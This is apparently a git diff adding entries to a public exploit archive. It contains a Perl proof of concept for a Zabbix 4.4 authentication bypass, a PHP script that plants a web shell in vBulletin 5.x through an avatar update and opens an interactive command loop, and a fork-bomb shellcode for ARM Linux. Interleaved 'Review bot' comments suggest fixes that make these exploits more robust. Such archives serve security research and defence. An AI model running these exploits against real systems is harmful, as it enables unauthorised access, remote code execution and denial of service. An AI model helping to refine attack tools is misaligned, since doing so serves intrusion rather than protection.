diff --git a/exploits/php/webapps/47474.pl b/exploits/php/webapps/47474.pl
new file mode 100755
index 000000000..6ab6c3bdb
--- /dev/null
+++ b/exploits/php/webapps/47474.pl
@@ -0,0 +1,123 @@
+# Exploit Title: Zabbix 4.4 - Authentication Bypass
+# Date: 2019-10-06
+# Exploit Author: Todor Donev
+# Software Link: https://www.zabbix.com/download
+# Version: Zabbix 4.4
+# Tested on: Linux Apache/2 PHP/7.2
+
+#
+# Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
+#
+# Copyright 2019 (c) Todor Donev
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# (Dont do anything without permissions)
+#
+# # [ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit
+# # [ Exploit Author: Todor Donev 2019
+# # [ Initializing the browser
+# # [ >>> Referer =>
+# # [ >>> User-Agent => Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1
+# # [ >>> Content-Type => application/x-www-form-urlencoded
+# # [ <<< Cache-Control => no-store, no-cache, must-revalidate
+# # [ <<< Connection => close
+# # [ <<< Date => Mon, 07 Oct 2019 12:29:54 GMT
+# # [ <<< Pragma => no-cache
+# # [ <<< Server => nginx
+# # [ <<< Vary => Accept-Encoding
+# # [ <<< Content-Type => text/html; charset=UTF-8
+# # [ <<< Expires => Thu, 19 Nov 1981 08:52:00 GMT
+# # [ <<< Client-Date => Mon, 07 Oct 2019 12:29:54 GMT
+# # [ <<< Client-Peer =>
+# # [ <<< Client-Response-Num => 1
+# # [ <<< Client-SSL-Cert-Issuer =>
+# # [ <<< Client-SSL-Cert-Subject =>
+# # [ <<< Client-SSL-Cipher => ECDHE-RSA-AES128-GCM-SHA256
+# # [ <<< Client-SSL-Socket-Class => IO::Socket::SSL
+# # [ <<< Client-SSL-Warning => Peer certificate not verified
+# # [ <<< Client-Transfer-Encoding => chunked
+# # [ <<< Link => ; rel="icon"; rel="apple-touch-icon-precomposed"; sizes="76x76"; rel="apple-touch-icon-precomposed"; sizes="120x120"; rel="apple-touch-icon-precomposed"; sizes="152x152"; rel="apple-touch-icon-precomposed"; sizes="180x180"; rel="icon"; sizes="192x192"; rel="stylesheet"; type="text/css"
+# # [ <<< Set-Cookie => zbx_sessionid=e125efe43b1f67b0fdbfb4db2fa1ce0d; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnlyPHPSESSID=n4dolnd118fhio9oslok6qpj3a; path=/zabbix/; HttpOnly
+# # [ <<< Strict-Transport-Security => max-age=63072000; includeSubdomains; preload
+# # [ <<< Title => TARGET: Dashboard
+# # [ <<< X-Content-Type-Options => nosniff
+# # [ <<< X-Frame-Options => SAMEORIGIN
+# # [ <<< X-Meta-Author => Zabbix SIA
+# # [ <<< X-Meta-Charset => utf-8
+# # [ <<< X-Meta-Csrf-Token => fdbfb4db2fa1ce0d
+# # [ <<< X-Meta-Msapplication-Config => none
+# # [ 
<<< X-Meta-Msapplication-TileColor => #d40000
+# # [ <<< X-Meta-Msapplication-TileImage => assets/img/ms-tile-144x144.png
+# # [ <<< X-Meta-Viewport => width=device-width, initial-scale=1
+# # [ <<< X-UA-Compatible => IE=Edge
+# # [ <<< X-XSS-Protection => 1; mode=block
+# # [
+# # [ The target is vulnerable. Try to open these links:
+# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view
+# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&ddreset=1
+# # [ https://TARGET/zabbix/zabbix.php?action=problem.view&ddreset=1
+# # [ https://TARGET/zabbix/overview.php?ddreset=1
+# # [ https://TARGET/zabbix/zabbix.php?action=web.view&ddreset=1
+# # [ https://TARGET/zabbix/latest.php?ddreset=1
+# # [ https://TARGET/zabbix/charts.php?ddreset=1
+# # [ https://TARGET/zabbix/screens.php?ddreset=1
+# # [ https://TARGET/zabbix/zabbix.php?action=map.view&ddreset=1
+# # [ https://TARGET/zabbix/srv_status.php?ddreset=1
+# # [ https://TARGET/zabbix/hostinventoriesoverview.php?ddreset=1
+# # [ https://TARGET/zabbix/hostinventories.php?ddreset=1
+# # [ https://TARGET/zabbix/report2.php?ddreset=1
+# # [ https://TARGET/zabbix/toptriggers.php?ddreset=1
+# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.list
+# # [ https://TARGET/zabbix/zabbix.php?action=dashboard.view&dashboardid=1
+#
+
+#!/usr/bin/perl -w
+
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use HTML::TreeBuilder;
+my $host = shift || ''; # Full path url to the store
+$host =~ s|/$||;
+print "\033[2J"; #clear the screen
+print "\033[0;0H"; #jump to 0,0
+print "[ Zabbix <= 4.4 Authentication Bypass Demo PoC Exploit\n";
+print "[ Exploit Author: Todor Donev 2019 \n";
+print "[ e.g. 
perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+ $browser->timeout(30);
+ $browser->agent($user_agent);
+my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
+my $response = $browser->request($request);
+print "[ >>> $_ => ", $request->header($_), "\n" for $request->header_field_names;
+print "[ <<< $_ => ", $response->header($_), "\n" for $response->header_field_names;
+print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
+print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
+if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
+ print "[\n[ The target is vulnerable. Try to open these links:\n";
+ my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
+ my @files = $tree->look_down(_tag => 'a');
+ for my $line (@files){
+ next if ($line->attr('href') =~ m/javascript/);
+ next if ($line->attr('href') =~ m/\#/);
+ next if ($line->attr('href') =~ m/http/);
+ print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
+ }
+} else {
+ print "[ Exploit failed! The target isn't vulnerable\n";
+ exit;
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/47475.php b/exploits/php/webapps/47475.php
new file mode 100644
index 000000000..08247ebb2
--- /dev/null
+++ b/exploits/php/webapps/47475.php
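Review bot: The `-w` on the `#!/usr/bin/perl -w` line has no effect because that line is not the first line of the file (it follows the header comment block), and nothing else enables warnings, so the `$line->attr('href')` calls in the `for my $line (@files)` loop match their regexes against `undef` silently whenever an anchor element carries no `href`. Adding `use warnings;` after `use strict;` and guarding the loop with `my $href = $line->attr('href') // next;` (then matching and printing `$href`) makes that case explicit. The `defined ($response->as_string())` test on the `if` line is always true and can be dropped. The hex-escaped string assigned to `$target` spells out the same `/zabbix/zabbix.php?action=dashboard.view&dashboardid=1` path that the header comment already lists in clear; escaping it only hurts readability.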
@@ -0,0 +1,121 @@
+ \n";
+ print "\nExample....: php $argv[0] http://localhost/vb/ user passwd";
+ print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n";
+ die();
+}
+
+list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
+
+$ch = curl_init();
+
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($ch, CURLOPT_HEADER, true);
+
+print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+
+if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n");
+
+curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
+curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
+curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
+
+if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n");
+
+print "[-] Logged-in! Retrieving security token...\n";
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POST, false);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
+
+if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n");
+
+print "[-] Uploading new avatar...\n";
+
+$params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]];
+
+curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture");
+curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
+curl_setopt($ch, CURLOPT_HEADER, false);
+
+if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n");
+
+if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n");
+
+print "[-] Updating avatar with PHP shell...\n";
+
+$php_code = '';
+
+$params = ["routestring" => "ajax/api/user/updateAvatar",
+ "userid" => 0,
+ "avatarid" => 0,
+ "data[extension]" => "php",
+ "data[filedata]" => $php_code,
+ "securitytoken" => 
$token[1]];
+
+curl_setopt($ch, CURLOPT_URL, $url);
+curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
+
+if (curl_exec($ch) !== "true") die("[-] Update failed!\n");
+
+print "[-] Launching shell...\n";
+
+preg_match('/(\d+)\.jpeg/', $path, $m);
+$path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path);
+
+curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}");
+curl_setopt($ch, CURLOPT_POST, false);
+
+while(1)
+{
+ print "\nvb-shell# ";
+ if (($cmd = trim(fgets(STDIN))) == "exit") break;
+ curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]);
+ preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
+}
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6c3923ac4..c1b43c91d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41794,7 +41794,7 @@ id,file,description,date,author,type,platform,port
 47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
 47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
 47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' Disable Functions Bypass",2019-09-28,mm0r1,webapps,multiple,
-47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
+47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
 47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
 47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
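Review bot: `curl_exec($ch)` returns `false` on a transport error, and every call in this hunk feeds that value straight into `preg_match` or into `json_decode(...)->avatarpath`, so a connection failure is reported as "Session ID not found!", "Login failed!" or a property read on `null` instead of as the transport problem it is. Capturing the response once, `if (($body = curl_exec($ch)) === false) die('[-] ' . curl_error($ch) . "\n");`, before each parse keeps the two failure modes apart. The `Logging in with username '{$user}' and password '{$pass}'` line also echoes the supplied password to the terminal, where it ends up in scrollback and session logs; printing only the username is enough. The start of the hunk (usage text and argument handling) is cut off in this view, so the `$argv` checks could not be reviewed.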
@@ -41805,3 +41805,5 @@ id,file,description,date,author,type,platform,port
 47467,exploits/php/webapps/47467.txt,"Zabbix 4.2 - Authentication Bypass",2019-10-07,"Milad Khoshdel",webapps,php,
 47469,exploits/php/webapps/47469.txt,"Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting",2019-10-07,Creatigon,webapps,php,
 47470,exploits/java/webapps/47470.txt,"IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload",2019-10-07,"Jakub Palaczynski",webapps,java,
+47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,
+47475,exploits/php/webapps/47475.php,"vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution",2019-10-07,EgiX,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 75d4df1f6..4f82bd66b 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1003,3 +1003,4 @@ id,file,description,date,author,type,platform
 47352,shellcodes/linux_x86/47352.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (107 Bytes)",2019-09-05,guly,shellcode,linux_x86
 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
+47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
diff --git a/shellcodes/arm/47473.c b/shellcodes/arm/47473.c
new file mode 100644
index 000000000..0da058c1b
--- /dev/null
+++ b/shellcodes/arm/47473.c
@@ -0,0 +1,79 @@
+# Title: Linux/ARM - Fork Bomb Shellcode (20 bytes)
+# Date: 2019-10-07
+# Category: Shellcode
+# Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite)
+# Author: CJHackerz
+# Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash
+
+/*
+## Compilation instruction
+
+pi@raspberrypi:~ cat forkbomb_ARM32.s
+.text
+.global _start
+
+_start:
+ .code 32
+ ADD R3, PC, #1 //Switching to Thumb mode
+ BX R3
+
+ .code 16
+ _loop:
+ EOR R7, R7
+ MOV R7, #2 //Syscall to fork()
+ SVC #1
+ MOV R8, R8 //NOP
+ BL _loop
+
+pi@raspberrypi:~ cat Makefile
+forkbomb_ARM32: forkbomb_ARM32.o
+ ld forkbomb_ARM32.o -o forkbomb_ARM32
+forkbomb_ARM32.o: forkbomb_ARM32.s
+ as forkbomb_ARM32.s -o forkbomb_ARM32.o
+clean:
+ rm *.o forkbomb_ARM32
+pi@raspberrypi:~ make
+pi@raspberrypi:~ objcopy -O binary forkbomb_ARM32 forkbomb_ARM32.bin
+pi@raspberrypi:~ hexdump -v -e '"\\""x" 1/1 "%02x" ""' forkbomb_ARM32.bin && echo
+\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff
+
+## Testing compiled shellcode
+pi@raspberrypi:~ file forkbomb_ARM32
+forkbomb_ARM32: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, not stripped
+pi@raspberrypi:~ strace ./forkbomb_ARM32
+execve("./forkbomb_ARM32", ["./forkbomb_ARM32"], 0x7eab36e0 ) = 0
+fork() = 21975
+fork() = 22000
+fork() = 22016
+fork() = 22044
+fork() = 22087
+fork() = 22125
+fork() = 22162
+fork() = 22199
+fork() = 22242
+fork() = 22287
+fork() = 22326
+fork() = 23343
+fork() = 23501
+fork() = 23539
+fork() = 23606
+fork() = 26670
+^Cstrace: Process 21974 detached
+
+## Steps to compile given shellcode C program file
+pi@raspberrypi:~ gcc -fno-stack-protector -z execstack forkbomb_ARM32.c -o forkbomb_ARM32-test
+
+*/
+
+
+#include
+#include
+
+unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff";
+main(){
+
+ printf("Shellcode Length: %d\n", 
(int)strlen(shellcode));
+ int (*ret)() = (int(*)())shellcode;
+
+ ret();
+}
\ No newline at end of file
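Review bot: The `# Title:` through `# Description:` lines at the top of the file sit outside any comment, so a C compiler reads them as preprocessing directives and rejects them as invalid, which is at odds with the `gcc -fno-stack-protector -z execstack …` build line given inside the comment block; those header lines belong inside the `/* … */` block or behind `//`. `main(){` also relies on implicit `int`, which C99 removed; `int main(void) {` is the portable form. The two `#include` lines appear with their header names stripped in this view, so they could not be checked.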